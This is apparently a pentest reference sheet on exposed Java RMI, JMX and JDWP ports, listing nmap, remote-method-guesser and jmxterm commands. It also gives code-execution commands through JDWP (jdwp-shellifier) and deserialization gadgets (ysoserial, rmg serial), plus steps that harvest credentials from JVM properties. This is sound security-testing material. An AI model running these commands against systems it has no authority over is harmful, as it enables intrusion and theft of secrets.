Java RMI, JMX and JDWP
Default Ports: 1099 (RMI), 9010/9999 (JMX), 5005 (JDWP)
Java RMI, JMX, and JDWP expose Java remote objects, management operations, and debugging interfaces. In pentests, unauthenticated Java management ports can reveal runtime data, MBeans, system properties, credentials, and sometimes code execution paths.
Connect
RMI Registry
RMI registry enumeration identifies bound names and remote objects.
nmap -p 1099 -sV target.com
rmg enum target.com 1099
rmg enum target.com 1099 --actions
JMX
JMX exposes JVM and application management data.
nmap -p 9010,9999,1099,7199 -sV target.com
java -jar jmxterm.jar -l target.com:9010
java -jar jmxterm.jar -l service:jmx:rmi:///jndi/rmi://target.com:1099/jmxrmi
JDWP
JDWP is a debug protocol and should not be exposed in production.
nmap -p 5005 -sV target.com
printf "JDWP-Handshake" | nc -nv target.com 5005
Recon
Service Detection with Nmap
Scan common Java application, management, and debug ports.
nmap -p 1099,5005,7001,7199,8000,8009,8080,9010,9999 -sV target.com
nmap -p 1099 --script rmi-dumpregistry target.com
nmap -p 5005 --script jdwp-info target.com
Product Context
Nearby services help identify Tomcat, JBoss, WebLogic, Cassandra, Kafka, or custom JVM apps.
nmap -p 80,443,8080,8081,8443,9990 -sV target.com
httpx -u http://target.com:8080 -title -tech-detect -status-code
TLS and Binding Review
JMX and RMI may expose dynamic ports in addition to the registry port.
rmg enum target.com 1099 --scan-action bound
nmap -p- --min-rate 5000 target.com
Enumeration
RMI Enumeration
Enumerate bound names, methods, and endpoint classes.
rmg enum target.com 1099
rmg guess target.com 1099
rmg known target.com 1099
JMX Enumeration
Use JMX to list domains, MBeans, attributes, and operations.
java -jar jmxterm.jar -l target.com:9010
domains
beans
info java.lang:type=Runtime
get java.lang:type=Runtime SystemProperties
JDWP Enumeration
The JDWP handshake confirms debug access.
printf "JDWP-Handshake" | nc -nv target.com 5005
nmap -p 5005 --script jdwp-info target.com
JVM Secret Review
JVM arguments and system properties may contain credentials.
get java.lang:type=Runtime InputArguments
get java.lang:type=Runtime SystemProperties
Attack Vectors
Exposed RMI Registry
RMI exposure may allow method discovery, deserialization testing, or unsafe remote object access.
rmg enum target.com 1099
rmg call target.com 1099 bound-name method-name
Unauthenticated JMX
Unauthenticated JMX can expose MBeans and dangerous operations.
java -jar jmxterm.jar -l target.com:9010
beans
info com.example:type=*
MLet Abuse
Some JMX deployments allow loading remote MBeans.
java -jar jmxterm.jar -l target.com:9010
bean javax.management.loading.MLet
JDWP Code Execution
Exposed JDWP can be used to execute code inside the JVM.
jdwp-shellifier.py -t target.com -p 5005 --cmd "id"
Deserialization Risk
RMI and JMX may expose Java deserialization paths.
rmg serial target.com 1099 CommonsCollections6 'id'
ysoserial CommonsCollections6 'id'
Post-Exploitation
Runtime Review
Collect JVM version, arguments, properties, and application names.
get java.lang:type=Runtime VmName
get java.lang:type=Runtime VmVersion
get java.lang:type=Runtime InputArguments
get java.lang:type=Runtime SystemProperties
Credential Review
Search runtime properties and configs for secrets.
grep -Ei 'password|secret|token|jdbc|ldap|aws|apikey' jmx-output.txt
Evidence Collection
Save minimal proof of exposure and accessible operations.
rmg enum target.com 1099 > rmi-enum.txt
nmap -p 5005 --script jdwp-info target.com -oN jdwp-info.txt
Useful Tools
| Tool | Purpose |
|---|---|
nmap | Port and script detection |
remote-method-guesser | RMI enumeration |
jmxterm | JMX client |
jdwp-shellifier | JDWP exploitation testing |
ysoserial | Java deserialization payloads |
nc | JDWP handshake check |
Security Misconfigurations
| Misconfiguration | Risk |
|---|---|
| RMI exposed | Remote object and deserialization attack surface |
| JMX unauthenticated | JVM and app management exposure |
| JDWP exposed | Debug access and code execution |
| JVM secrets in properties | Credential leakage |
| Dynamic RMI ports exposed | Unexpected management access |
| No network restriction | Internal management exposed broadly |